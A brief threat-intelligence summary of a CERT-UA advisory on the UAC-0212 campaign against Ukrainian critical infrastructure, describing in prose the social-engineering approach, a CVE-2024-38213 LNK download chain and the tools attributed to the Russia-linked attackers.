UAC-0212 attack campaign against critical infrastructures in Ukraine

The Computer Emergency Response Team of Ukraine (CERT-UA) has notified of a new attack campaign on its critical infrastructure, based on its own analysis of targeted attacks between the months of July 2024 to February 2025. This type of campaign has been linked to known Russian hacker groups such as Sandworm, APT44, Seashell Blizzard. The main goal of these attackers is to compromise the information and communication systems of Ukrainian critical infrastructures.

The most common method used by the attackers as a gateway is to establish communication with the companies, impersonating as potential customers. Once they gain a certain level of trust with the company, they send supposed “technical documentation” via link to a PDF document. Through this link, the vulnerability CVE-2024-38213 is exploited, causing the victim to download a hidden LNK file, bypassing the web protection mechanisms of Windows systems.Once executed, this file triggers a PowerShell command that, while displaying the PDF document, secretly downloads and installs malicious EXE/DLL executable files on the victim machine.

For the implementation of these attacks, CERT-UA has identified the use of exploitware tools such as SECONDBEST, EMPIREPAST, SPARK, CROOKBAG. It also highlights the use of RSYNC, to persistently collect information.